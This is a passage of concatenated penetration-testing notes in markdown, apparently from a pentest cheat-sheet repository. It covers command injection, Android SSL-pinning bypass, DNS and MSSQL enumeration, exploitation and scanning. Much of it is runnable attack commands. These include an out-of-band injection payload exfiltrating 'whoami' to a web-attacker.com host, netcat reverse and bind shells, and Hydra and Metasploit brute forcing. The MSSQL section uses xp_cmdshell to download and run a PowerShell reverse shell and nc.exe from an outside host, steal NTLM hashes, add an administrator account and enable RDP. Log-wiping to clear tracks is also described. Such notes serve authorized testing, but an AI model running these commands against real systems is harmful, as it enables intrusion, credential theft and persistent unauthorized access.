| 33 | #### Blind 34 | 35 | * Shell metacharacters: `&`, `&&`, `|`, `||`, `;`, `\n`, `` ` ``, `$()`. 36 | * Trigger a time delay. 37 | * `127.0.0.1 && sleep 10 &` 38 | * `127.0.0.1 ping -c 10 127.0.0.1 &` 39 | * Output the response of the command in the web root and retrieve the file directly using a browser 40 | * `127.0.0.1 & whoami > /var/www/static/whoami.txt &` 41 | * Open an out-of-band channel back to a server you control. 42 | * `127.0.0.1 & nslookup asdfjkl.web-attacker.com &` 43 | * ``127.0.0.1 & nslookup `whoami` .asdfjkl.web-attacker.com &`` 44 | 45 | ### Automate Exploitation Tools 46 | 47 | * Burp Suite 48 | * arachni 49 | * OWASP Zap 50 | * Wapiti 51 | * acunetix 52 | * w3af 53 | 54 | ### How to Prevent 55 | 56 | The most effective way to prevent OS command injection vulnerabilities is to never call out to OS commands from application-layer code. Instead, implement the required functionality using safer platform APIs. 57 | 58 | * For example: use `mkdir()` instead of `system("mkdir /dir_name")` 59 | 60 | If it is required to perform OS commands using user-supplied input, then strong input validation must be performed. 61 | 62 | * Validate against a whitelist of permitted values. 63 | * Validate that the input is as expected or valid input. 64 | 65 | -------------------------------------------------------------------------------- /mobile/android/support-and-tools.md: -------------------------------------------------------------------------------- 1 | # Support and Tools 2 | 3 | ## Notes 4 | 5 | ### OS Versions 6 | 7 | * Android 6 - Device does not need to be rooted 8 | * Android 7.1 - Device needs to be rooted before it will accept the burp cert 9 | 10 | ### Certificate Pinning 11 | 12 | ## Setup 13 | 14 | ### Frida Server 15 | 16 | Find out the arch version of the device 17 | 18 | `adb shell getprop ro.product.cpu.abi` 19 | 20 | Download the Frida server version from the following URL and extract it 21 | 22 | * https://github.com/frida/frida/releases/ 23 | * frida-server-xxxx-android-x86.xz 24 | * frida-server-xxxx-android-x86\_64.xz 25 | * Windows: `adb push C:\ADB\ /data/local/tmp` 26 | * Linux: `adb push ADB/ /data/local/tmp` 27 | * Both: `adb shell chmod 777 /data/local/tmp/` 28 | 29 | ### Burp 30 | 31 | 1. Open Burp and go to Proxy tab 32 | 2. Select Options tab 33 | 3. Click the Import/Export CA Certificate 34 | 4. Export Certificate in DER format 35 | 5. Push the Certificate onto the device with ADB (We will need this later for Frida) 36 | 1. `adb push cacert.der /data/local/tmp/cert-der.crt` 37 | 38 | ### SSL Pinning 39 | 40 | Script that will be used to overwrite the certificate pinning mechanism 41 | 42 | [https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/](https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/) 43 | 44 | #### Script injection to bypass certificate pinning 45 | 46 | * Push the script onto the device 47 | * `adb push C:\ADB\fridascriptjs /data/local/tmp` 48 | * Check and run Frida server on the device 49 | * `adb shell /data/local/tmp/ &` 50 | * List all the running processes on the device 51 | * `frida-ps -U` 52 | * Locate your applications package name from the list 53 | * i.e. 3672 com.twitter.android 54 | * Hook Frida script into your application 55 | * `frida -U -f com.twitter.android -l --no-paus` 56 | 57 | #### Why we need certificate pinning bypass 58 | 59 | * Mobile apps encrypt traffic for HTTPS which uses a certificate to do this 60 | * We can insert Burp certificate into Android to capture requests 61 | * Developer protection: Certificate pinning 62 | * App checks to make sure only it's own cert can encrypt traffic 63 | * Our Solution: Certificate pinning bypass 64 | * Overwrite the code in the API that's responsible for check cert 65 | * Frida 66 | 67 | ## Tools 68 | 69 | * ADB (Android Debug Bridge) 70 | * jadx 71 | * dex2jar 72 | * Frida 73 | * Burpsuite 74 | * Genymotion 75 | * Android Studio Virtual Device Manager 76 | -------------------------------------------------------------------------------- /penetration-testing-methodology/5-stages-of-ethical-hacking.md: -------------------------------------------------------------------------------- 1 | # 5 Stages of Ethical Hacking 2 | 3 | ## 5 Stages of Ethical Hacking 4 | 5 | ### Reconnaissance 6 | 7 | #### AKA Footprinting 8 | 9 | * Finding out specific IP addresses, TCP & UDP services, Identifies vulnerabilities 10 | * Network, Host, People involved 11 | 12 | #### Active 13 | 14 | Directly interacting with the target to gather information about the target. 15 | 16 | #### Passive 17 | 18 | Trying to collect the information about the target without directly accessing the target. To this purpose, hacker can use social media, public websites etc. 19 | 20 | ### Scanning (& Enumeration) 21 | 22 | Nmap, Nessus, Nikto, etc. 23 | 24 | 1. **Pre-attack** - Hacker scans the network for specific information based on the information gathered during reconnaissance. 25 | 2. **Port scanning** - This phase involves scanning the target for the information like open ports, live systems, various services running on the host. 26 | 3. **Vulnerability Scanning** - Checking the target for weaknesses or vulnerabilities which can be exploited. Usually done with help of automated tools 27 | 4. **Network Mapping/Information Extraction** - Finding the topology of network, routers, firewalls servers if any, and host information and drawing a network diagram with the available information. This map may serve as a valuable piece of information throughout the hacking process. 28 | 29 | ### Gaining Access (Exploitation) 30 | 31 | This phase is where an attacker breaks into the system/network using various tools or methods. After entering into a system, he has to increase his privilege to administrator level so he can install an application he needs or modify data or hide data. 32 | 33 | #### Examples 34 | 35 | * Phishing, MitM, Brute Force, Spoofing, DoS, BOF, Session Hijacking, BEC 36 | 37 | ### Maintaining Access 38 | 39 | Hacker may just hack the system to show it was vulnerable or he can be so mischievous that he wants to maintain or persist the connection in the background without the knowledge of the user. This can be done using Trojans, Rootkits or other malicious files. The aim is to maintain the access to the target until he finishes the tasks he planned to accomplish in that target. 40 | 41 | ### Clearing Tracks 42 | 43 | No thief wants to get caught. An intelligent hacker always clears all evidence so that in the later point of time, no one will find any traces leading to him. This involves modifying/corrupting/deleting the values of Logs, modifying registry values and uninstalling all applications he used and deleting all folders he created. 44 | 45 | #### Examples 46 | 47 | * Clearing the cache and cookies 48 | * Modifying registry values 49 | * Modifying/corrupting/deleting the values of Logs 50 | * Clearing out Sent emails 51 | * Closing all the open ports 52 | * Uninstalling all applications that he/she be used 53 | -------------------------------------------------------------------------------- /pentesting-network/53-dns.md: -------------------------------------------------------------------------------- 1 | # 53 (DNS) 2 | 3 | ## Enumeration 4 | 5 | When seeing port 53 show up, you can add the IP of the host to the resolv.conf file 6 | 7 | `nameserver ` 8 | 9 | ### Hostname Leak 10 | 11 | #### nslookup 12 | 13 | ```bash 14 | nslookup 15 | > server 16 | >127.0.0.1 17 | >127.0.0.2 18 | > 19 | ``` 20 | 21 | ### Banner Grabbing 22 | 23 | ```bash 24 | dig version.bind CHAOS TXT @DNS 25 | ``` 26 | 27 | ### More Info 28 | 29 | #### nslookup 30 | 31 | ```bash 32 | root@INE:~# nslookup 33 | > server 192.212.168.3 34 | > set q=NS # Can also change per record i.e. A, MX, etc. 35 | > witrap.com # Chage the hostname as needed 36 | # Should return additional domains 37 | ``` 38 | 39 | #### dnsenum 40 | 41 | ```bash 42 | dnsenum target # Zone transfer 43 | ``` 44 | 45 | #### nmap 46 | 47 | ```bash 48 | nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" 49 | nmap --script dns-nsid 50 | ``` 51 | 52 | #### gobuster 53 | 54 | ```bash 55 | gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt 56 | ``` 57 | 58 | #### Metasploit 59 | 60 | ```bash 61 | auxiliary/gather/enum_dns # Perform enumeration actions 62 | ``` 63 | 64 | ### Zone Transfers 65 | 66 | #### dig / fierce 67 | 68 | ```bash 69 | dig axfr @ns1.test.com 70 | dig axfr @ # Try zone transfer without domain 71 | dig axfr @ # Try zone transfer guessing the domain 72 | fierce --domain --dns-servers # Will try to perform a zone transfer against every authoritative name server and if this doesn'twork, will launch a dictionary attack 73 | dig @192.212.168.3 witrap.com -t AXFR +nocookie 74 | ``` 75 | 76 | #### Host 77 | 78 | ```bash 79 | # Zone transfer 80 | sudo vim /etc/hosts 81 | 10.10.10.123 friendzone.red 82 | host -l 10.10.10.123 friendzone.red # Zone Transfer 83 | host -t axfr witrap.com 192.212.168.3 84 | ``` 85 | 86 | #### dnsrecon 87 | 88 | ```bash 89 | dnsrecon -d target.com -t axfr # Zone Transfer 90 | dnsrecon -d target.com -D words.txt -t brt # Brute force domain 91 | dnsrecon -d -a 92 | ``` 93 | 94 | ## Brute Force 95 | 96 | ### Reverse 97 | 98 | #### dnsrecon 99 | 100 | ```bash 101 | dnsrecon -d 102 | dnsrecon -d active.htb -a -n # Zone transfer 103 | dnsrecon -r 127.0.0.0/24 -n -d # DNS reverse of all of the addresses 104 | dnsrecon -r 127.0.0.1/24 -n -d # DNS reverse of all of the addresses 105 | dnsrecon -r /24 -n # DNS reverse of all of the addresses 106 | dnsrecon -d -r 10.0.0.0/8 107 | ``` 108 | 109 | ### Subdomain 110 | 111 | #### dnsrecon / dnscan 112 | 113 | ```bash 114 | dnsrecon -D subdomains-1000.txt -d -n 115 | dnscan -d -r -w subdomains-1000.txt # Bruteforce subdomains in recursive way, https://github.com/rbsec/dnscan 116 | ``` 117 | 118 | #### Other 119 | 120 | ``` 121 | https://github.com/blark/aiodnsbrute 122 | ``` 123 | -------------------------------------------------------------------------------- /exploitation/exploitation-basics.md: -------------------------------------------------------------------------------- 1 | # Exploitation Basics 2 | 3 | ## Reverse Shells vs Bind Shells 4 | 5 | ### Reverse Shell 6 | 7 | A victim connects to us. 8 | 9 | #### Attacker 10 | 11 | ```bash 12 | nc -lvnp 4444 # Listening 13 | ``` 14 | 15 | #### Target 16 | 17 | ```bash 18 | nc -e /bin/sh # Connecting 19 | ``` 20 | 21 | ### Bind Shell 22 | 23 | We connect to the victim. 24 | 25 | #### Attacker 26 | 27 | ```bash 28 | nc 4444 # Connecting 29 | ``` 30 | 31 | #### Target 32 | 33 | ```bash 34 | nc -lvnp 4444 -e /bin/sh # Listening 35 | ``` 36 | 37 | ## Staged vs Non-Staged Payloads 38 | 39 | ### Staged 40 | 41 | * Sends payload in stages 42 | * Can be less stable 43 | * Example: `windows/meterpreter/reverse_tcp` 44 | 45 | ### Non-staged 46 | 47 | * Sends exploit shellcode all at once 48 | * Larger in size and won't always work 49 | * Example: `windows/meterpreter_reverse_tcp` 50 | 51 | ## Gaining Root with Metasploit 52 | 53 | ### Example 54 | 55 | ```bash 56 | searchsploit samba 2.2 57 | # Found a 'trans2open' vulnerability with (Metasploit) mentioned 58 | msfconsole 59 | search trans2open 60 | use exploit/linux/samba/trans2open 61 | set RHOSTS 62 | run / exploit 63 | # Session kept opening and closing... 64 | # Looking at the options we see the payload linux/x86/meterpreter/reverse_tcp 65 | # Since this didn't work we can change it to a Non-staged payload 66 | set payload linux/x86/shell_reverse_tcp 67 | run / exploit 68 | ``` 69 | 70 | ## Manual Exploitation 71 | 72 | ### Example 73 | 74 | Finding an Apache mod\_ssl < 2.8.7 vulnerability 75 | 76 | Used Google to identify there is an exploit called OpenLuck on GitHub 77 | 78 | Followed the steps on GitHub to download, install, compile, and run the exploit. 79 | 80 | ## Brute Force Attacks 81 | 82 | ### Tools 83 | 84 | #### Hydra 85 | 86 | ```bash 87 | hydra -l -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh:// -t 4 88 | ``` 89 | 90 | #### Metasploit 91 | 92 | ```bash 93 | search ssh 94 | use auxiliary/scanner/ssh/ssh_login 95 | set USERNAME root 96 | set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt 97 | set RHOSTS 98 | run 99 | ``` 100 | 101 | ## Credential Stuffing and Password Spraying 102 | 103 | ### What is Credential Stuffing? 104 | 105 | Injecting breached account credentials in hopes of account takeover by testing large volumes of stolen usernames and passwords across multiple sites. 106 | 107 | ### What is Password Spraying? 108 | 109 | Injecting breached account credentials in hopes of account takeover by attempting to access a large number of sites using known account identifiers (usernames) with a few commonly used passwords. 110 | 111 | ## Metasploit Unleashed 112 | 113 | {% embed url="https://www.offensive-security.com/metasploit-unleashed" %} 114 | 115 | ## Armitage 116 | 117 | _Armitage_ is a fantastic Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit. 118 | 119 | {% embed url="https://www.offensive-security.com/metasploit-unleashed/armitage" %} 120 | -------------------------------------------------------------------------------- /information-gathering-reconnaissance/passive-reconnaissance.md: -------------------------------------------------------------------------------- 1 | # Passive Reconnaissance 2 | 3 | ## Passive Reconnaissance Overview 4 | 5 | ### Physical/Social 6 | 7 | #### Location Information 8 | 9 | * Satellite images, Drone recon, Building layout (badge readers, break areas, security, fencing) 10 | 11 | #### Job Information 12 | 13 | * Employees (name, job title, phone number, manager, etc.) 14 | * Pictures (badge photos, desk photos, computer photos, etc.) 15 | 16 | ### Web/Host 17 | 18 | #### Target Validation 19 | 20 | * WHOIS, nslookup, dnsrecon 21 | 22 | #### Finding Subdomains 23 | 24 | * Google Fu, dig, Nmap, Sublist3r, Bluto, crt.sh, etc. 25 | 26 | #### Fingerprinting 27 | 28 | * Nmap, Wappalyzer, WhatWeb, BuiltWith, Netcat 29 | 30 | #### Data Breaches 31 | 32 | * HaveIBeenPwned, Breach-Parse, WeLeakInfo 33 | 34 | ## Identify Our Target 35 | 36 | Bugcrowd. Rules of Engagement; Make sure your in scope, noting the out of scope items. 37 | 38 | ## Discovering Email Addresses 39 | 40 | ### Tools 41 | 42 | * hunter.io 43 | * phonebook.cz 44 | * voilanorbert.com 45 | * clearbit connect Chrome extension 46 | * emailhippo - tools.verifyemailaddress.io 47 | * email-chekcer.net/validate 48 | 49 | ## Breached Credentials 50 | 51 | ### Gathering Breached Credentials 52 | 53 | #### Breach-Parse 54 | 55 | Tool on GitHub by TCM that uses breached username and password credentials and searching on a specific domain names to limit the accounts for that domain. Credential Stuffing. 56 | 57 | ### Hunting Breached Credentials 58 | 59 | #### DeHashed 60 | 61 | Payed service at dehashed.com. 62 | 63 | ## Hunting Subdomains 64 | 65 | ### Tools 66 | 67 | * Sublist3r 68 | * `sublist3r -d tesla.com` 69 | * crt.sh (Website) 70 | * OWASP Amass 71 | * httprobe 72 | 73 | ## Identifying Website Technologies 74 | 75 | ### Tools 76 | 77 | * builtwith.com 78 | * Wappalyzer 79 | * whatweb 80 | * `whatweb https://tesla.com` 81 | 82 | ## Information Gathering with Burp Suite 83 | 84 | Intercept website traffic. View/modify requests. View Target details. 85 | 86 | ## Google Fu 87 | 88 | ### Examples 89 | 90 | * `site:tesla.com -www` 91 | * `site:tesla.com filetype:pdf` 92 | 93 | ### Resources 94 | 95 | {% embed url="https://ahrefs.com/blog/google-advanced-search-operators" %} 96 | 97 | {% embed url="https://moz.com/learn/seo/search-operators" %} 98 | 99 | ## Utilizing Social Media 100 | 101 | ### Websites 102 | 103 | * LinkedIn 104 | * Twitter 105 | * Facebook 106 | 107 | ### Look For 108 | 109 | * Pictures 110 | * Badge photos 111 | * Desk pictures 112 | * People and their information 113 | 114 | ## OSINT Fundamentals 115 | -------------------------------------------------------------------------------- /pentesting-network/1433-mssql.md: -------------------------------------------------------------------------------- 1 | # 1433 (MSSQL) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Try default credentials "sa:password" 8 | * [ ] Brute force creds 9 | * [ ] Check database content for new passwords 10 | * [ ] Check version for exploits 11 | * [ ] RCE 12 | * [ ] through xp\_cmdshell functionality 13 | * [ ] through injecting payload in output file, placing it in webroot and triggering it through webapp 14 | 15 | ### Connection 16 | 17 | #### sqsh 18 | 19 | ```bash 20 | sqsh -S -U sa 21 | sqsh -S -U sa -P password 22 | sqsh -S :27900 -U sa -P password 23 | ``` 24 | 25 | #### mssqlclient.py 26 | 27 | ```bash 28 | mssqlclient.py -windows-auth /:@ 29 | mssqlclient.py :@ 30 | 31 | # Once logged in you can run queries: 32 | SQL> select @@ version; 33 | 34 | # Steal NTLM hash 35 | sudo smbserver.py -smb2support liodeus . 36 | SQL> exec master..xp_dirtree '\\\liodeus\' # Steal the NTLM hash, crack it with john or hashcat 37 | 38 | # Try to enable code execution 39 | SQL> enable_xp_cmdshell 40 | 41 | # Execute code 42 | SQL> xp_cmdshell whoami /all 43 | SQL> xp_cmdshell certutil.exe -urlcache -split -f http:///nc.exe 44 | ``` 45 | 46 | ### nmap 47 | 48 | ```bash 49 | nmap -p 1433 --script='banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)' -o 1433_nmap_mssql 50 | # Credential Brute Force 51 | nmap -p 1433 --script ms-sql-brute --script-args passdb=/usr/share/seclists/Passwords/darkweb2017-top1000.txt 52 | 53 | nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 54 | ``` 55 | 56 | ### xp\_cmdshell 57 | 58 | #### Enable 59 | 60 | ```bash 61 | exec sp_configure 'show advanced options', 1 62 | go 63 | reconfigure 64 | go 65 | exec sp_configure 'xp_cmdshell', 1 66 | go 67 | reconfigure 68 | go 69 | ``` 70 | 71 | #### Commands 72 | 73 | ```bash 74 | # Manaul enumeration 75 | xp_cmdshell 'whoami /all'; 76 | xp_cmdshell 'systeminfo'; 77 | xp_cmdshell 'net user'; # Potential for brute force or password re-use 78 | xp_cmdshell 'reg query HKLM /f pass /t REG_SZ /s'; # Search registry for pass 79 | xp_cmdshell 'findstr /si password *.txt *.ini *.config *xml' # Check for plaintext passwords 80 | # Run other PrivEsc commands for enumeration 81 | 82 | # Download files for reverse shell 83 | xp_cmdshell "powershell -c iex(new-object net.webclient).downloadstring('http://192.168.119.165:9090/Invoke-PowerShellTcp.ps1')";-- 84 | xp_cmdshell "certutil -urlcache -f 'http://192.168.119.165:9090/nc.exe' nc.exe" 85 | 86 | # Create user and pass then add them to Admin group (Need enough permissions) 87 | xp_cmdshell 'net user byte bytepass /add' 88 | go 89 | xp_cmdshell 'net localgroup Administrators byte /add' 90 | go 91 | xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' 92 | go 93 | ``` 94 | 95 | ### Metasploit 96 | 97 | ```bash 98 | use auxiliary/scanner/mssql/mssql_ping 99 | ``` 100 | 101 | ## Brute Force 102 | 103 | ### Metasploit 104 | 105 | ```bash 106 | scanner/mssql/mssql_login 107 | ``` 108 | 109 | ### Hydra 110 | 111 | ```bash 112 | hydra -l sa -P password.txt -V mssql 113 | hydra -L -P mssql -vV -I -u 114 | ``` 115 | 116 | ### Cheat sheet 117 | 118 | ```bash 119 | https://www.asafety.fr/mssql-injection-cheat-sheet/ 120 | ``` 121 | -------------------------------------------------------------------------------- /scanning-and-enumeration/network-scanning.md: -------------------------------------------------------------------------------- 1 | # Network Scanning 2 | 3 | ## nmap 4 | 5 | ### Examples 6 | 7 | ```bash 8 | nmap -T4 -p- -oA nmap/tcp_all_ports # Scan all TCP ports 9 | nmap -T4 -p- -oA --open -vv nmap/tcp_all_ports_verbose # Same but be verbose and show open ports 10 | nmap -sCV -p -oA nmap/tcp_def_scripts # Default scripts with found ports 11 | nmap --script *vuln* -p -oA nmap/tcp_vlun_scripts # Vuln scripts with found ports 12 | ``` 13 | 14 | ### Basic Scans 15 | 16 | ```bash 17 | nmap # Basic scan of the top 1000 ports 18 | nmap -p- # Basic scan of all 65535 ports 19 | nmap -iL # Input from list of hosts/networks 20 | nmap -v # Increase verbosity level (use -vv or more for greater effect) 21 | ``` 22 | 23 | ### Host Discovery 24 | 25 | ```bash 26 | nmap -sn # Ping Scan - disable port scan 27 | nmap -Pn # Treat all hosts as online -- skip host discovery 28 | ``` 29 | 30 | ### Scan Techniques 31 | 32 | ```bash 33 | nmap -sS # SYN scan 34 | nmap -sU # UDP scan 35 | ``` 36 | 37 | ### Port Specification 38 | 39 | ```bash 40 | nmap -p22 # Scan a specific port 41 | nmap -p22,80,443 # Scan multiple specific ports 42 | nmap -p1-65535 # Scan a range of ports 43 | ``` 44 | 45 | ### Service/Version & OS Detection 46 | 47 | ```bash 48 | nmap -sV # Probe open ports to determine service/version info 49 | nmap -O # Enable OS detection 50 | nmap -A # Enable OS detection, version detection, script scanning, and traceroute 51 | ``` 52 | 53 | ### Script Scan 54 | 55 | ```bash 56 | nmap -sC # equivalent to --script=default 57 | nmap --script=